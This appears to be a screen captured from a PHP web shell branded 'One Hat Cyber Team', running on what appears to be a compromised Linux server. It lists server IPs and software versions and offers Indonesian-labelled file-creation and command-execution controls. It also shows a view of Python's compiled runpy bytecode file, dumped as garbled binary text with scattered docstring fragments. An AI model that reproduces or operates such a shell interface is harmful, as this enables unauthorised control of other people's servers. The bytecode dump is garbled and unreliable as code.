⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.30
Server IP:
45.79.8.107
Server:
Linux localhost 5.15.0-140-generic #150-Ubuntu SMP Sat Apr 12 06:00:09 UTC 2025 x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.2-1ubuntu2.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3.10
/
__pycache__
/
View File Name :
runpy.cpython-310.pyc
o }5h73 @ s d Z ddlZddlZddlZddlZddlZddlZddgZG dd de Z G dd de Z dd d Z dddZ efd dZG dd deZd ddZ d!ddZefddZdd Zd"ddZedkreejdk r{edejd dS ejd= eejd dS dS )#aZ runpy.py - locating and running Python code using the module namespace Provides support for locating and running Python scripts using the Python module namespace instead of the native filesystem. This allows Python code to play nicely with non-filesystem based PEP 302 importers when locating support scripts as well as when importing modules. N run_modulerun_pathc @ s( e Zd ZdZdd Zdd Zdd ZdS ) _TempModulezCTemporarily replace a module in sys.modules with an empty namespacec C s || _ t|| _g | _d S N)mod_nametypes ModuleTypemodule _saved_moduleselfr r /usr/lib/python3.10/runpy.py__init__ s z_TempModule.__init__c C s@ | j }z| jtj| W n ty Y nw | jtj|<